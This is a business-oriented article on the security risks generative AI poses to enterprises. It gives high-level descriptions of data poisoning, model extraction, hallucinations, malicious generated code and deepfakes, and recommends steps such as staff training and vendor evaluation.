Identify Generative AI’s Inherent Risks to Protect Your Business
Generative AI is the hot topic of the moment, but it’s not without risks to your enterprise. We explain the vulnerabilities and what you can do to guard against them.
- By Neil Serebryany
- September 5, 2023
Generative artificial intelligence (or simply generative AI) is one of the more recent tech developments revolutionizing the way organizations function. At the user’s request, generative AI models produce new media -- text, video, audio, etc. -- derived from huge data sets used to train them. These multimodal models, which include ChatGPT, Midjourney, and Voicebox (among others), are streamlining processes, automating repetitive tasks, and analyzing and synthesizing vast amounts of data, which increases productivity and efficiency, enhances decision-making, and drives innovation.
From banks, insurance companies, and law firms to advertising agencies, biotech startups, retail chains, and major research universities, generative AI models are leading decision-makers to reconsider the “standard” way of doing things.
The potential for further advancements in this area is an exciting prospect, but the new risks these models pose to revenue streams, data, operations, cloud and physical infrastructure (and more) cannot be overlooked. One step that has been too-often left unconsidered in the chaotic rush to adopt generative AI models is that organizations must have a strategy for incorporating these powerful tools into their ecosystems. Otherwise, they are guaranteed to have a very rocky road ahead of them.
A robust AI security strategy must consider the benefits and risks these powerful AI-based tools can bring to the organization as well as how these tools will be used, by whom, and for what purpose. These questions matter because many (perhaps most) threats depend on the humans in the mix, whether that is an employee who unknowingly clicks a link that introduces a technical vulnerability or members of the security team themselves who fail to foresee the opportunity for a human vulnerability or forget to think like a hacker who is actively creating vulnerabilities.
Introduction of a Technical Vulnerability
Even generative AI models that are meticulously developed and rigorously tested can be prone to technical vulnerabilities that, if exploited, can harm any entity using the model. If you consider a typical company network, for example, it could have a “backdoor” into the system; that’s the technical vulnerability, whether or not the security team knows it’s there. The existence of the backdoor is one part of the problem, but when a hacker finds it and uses it to gain access to the system (and exploits the vulnerability), the organization is in trouble. The situation with generative AI models is similar but has a few significant differences.
Generative AI models have basically three attack surfaces: the architecture of the model itself, the data it was trained on, and the data fed into it by end users. For example, adversarial attacks and data poisoning depend on the model’s training data having a security flaw and thus being open to manipulation and infiltration. This allows threat actors to inject incorrect or misleading information into the training data, which the model uses to generate responses, leading to inaccurate information presented as accurate by a trusted model and, subsequently, flawed decision-making.
Model extraction attacks depend on the skill of the hacker to compromise the model itself. The threat actor queries the model to gain information about its structure and, therefore, determine the actions it executes and what its targets are. One goal of this sort of attack could be reverse-engineering the model’s training data, for instance, private customer data, or recreating the model itself for nefarious purposes.
Notably, any of these attacks can take place before or after the model is installed at a user site. They can be carried out silently and stealthily, avoiding detection for weeks or months, all the while potentially affecting system security, data integrity, investment or operational strategies, the safety of physical infrastructure, and revenue streams. As with a malware attack, standard security protocols, such as access controls and user authentication, won’t do much to prevent damage once a destructive element has been introduced to the system, however inadvertently.
Failing to Foresee Potential Human Vulnerabilities
Exploitable human vulnerabilities are really a wide-open category. They can range from a mindless click on a link in a large language model’s (LLM’s) response that turns out to be the first step of a malicious attack to the less technical (but potentially equally damaging) error made by a person who doesn’t fully understand how generative AI models work. Essentially, they reassemble data, but sometimes responses are so thoroughly “generated” that they are made-up nonsense that comes across as real. Such responses are known as “hallucinations'' and can cause issues for users who trust the model’s responses without verifying them.
These situations can provoke real consequences for a company, from data loss or system damage to reputational damage and loss of customer confidence. Likewise, if prompts contain words or phrases parsed in certain ways, the responses can be significantly different than if the prompts had been written more carefully or had not included certain words. The information returned in such cases can be factually accurate and verifiable but contextually skewed, thus leading to issues such as strategic decisions being built on a faulty foundation.
LLMs are more consistently identifying biased, stereotypical, and toxic terms and phraseology, pushing back by not providing responses to prompts that include them -- but they have a long way to go. Human ownership of the outgoing content and accountability for incoming content are key issues to consider, and automated review and verification are on the near horizon. If an organization only has a standard security setup, employee education and training will be the critical, but not necessarily easy or convenient, solution to forestalling human vulnerabilities.
Not Thinking Like a Hacker Actively Creating Vulnerabilities
This threat is a hybrid of the other two because we’re talking about code, which, by default, means nothing happens organically or completely by accident. There is always a human coder who wrote the commands that created the vulnerability that infected a system, stole data, or triggered a series of events. To be clear, code “generated” by an LLM or other generative AI model is existing code that’s already “out there” and just reassembled or copied outright by the model.
The burden is on a user to understand any generated code as well as what it can do. If a user who is not a proficient coder (or not a coder at all) asks the model whether the code contains malicious commands, the odds are probably even that the response will be wrong, no matter the answer. That’s neither a feature nor a bug; it’s just reality. The model is a non-sentient, software-driven system that has no values or conscience and doesn’t care if the code is malicious; it exists to respond to prompts. The person installing the code without knowing that it’s safe is an insider threat with access to organizational assets.
Deepfakes are another type of content generated by an LLM or other generative AI model that can harm an enterprise. Done well, deepfakes are extraordinarily convincing photographic, audio, or video imitations of real people and are more difficult to detect with every iteration of software. The technology is quite impressive -- and incredibly dangerous.
The result of people believing a deepfake is real and true could be reputational harm to your enterprise or its leaders if they are “shown” saying, doing, or supporting unethical, illegal, or otherwise damaging things. It puts the organization in the difficult position of having to prove a negative in the face of very persuasive “proof.” In terms of fake written content, disinformation and misinformation, such as news articles and social media posts, have arguably already won the battle for hearts and minds.
Planning for Success While Bracing for a Crisis
Generative AI models represent an enormous leap forward for society, with all the attendant risks great advances bring. Running away from these models out of fear of those risks is not a plan any more than is running toward them without acknowledging the risks. By all means, adopt, deploy, and innovate -- but prepare for possible negative effects. Take proactive measures to protect and mitigate risks to your organization, employees, customers, and shareholders, and have a plan for responding effectively if they become victims of misinformation or malicious use of such content.
Here are a few proactive steps organizations your organization can take.
- Make informed decisions by understanding who in your organization will be using the model and to what ends.
- Study the offerings available; not all LLMs are the same. They are made by different teams and companies and are trained on different data sets. Some, such as ChatGPT, are “conversant” and others, such as Cohere, are not. Some are industry-specific, such as Harvey and BloombergGPT.
- Be confident of the model’s suitability for your specific use case(s) and understand its level of robustness and accuracy. One way to do this is to work with the vendors or run an in-house pilot program to enable your team to effectively identify potential risks and vulnerabilities associated with the model and understand its behavior.
- Educate your staff about the risks of using generative AI tools, including what to do and what not to do when submitting queries and reviewing responses.
- Educate your customers about the chatbots or virtual assistants used on your website or mobile apps. Ensure that they know what information they should and should not enter.
Taking steps such as these can help ensure the security of your generative AI ecosystem and foster transparency and trust with stakeholders.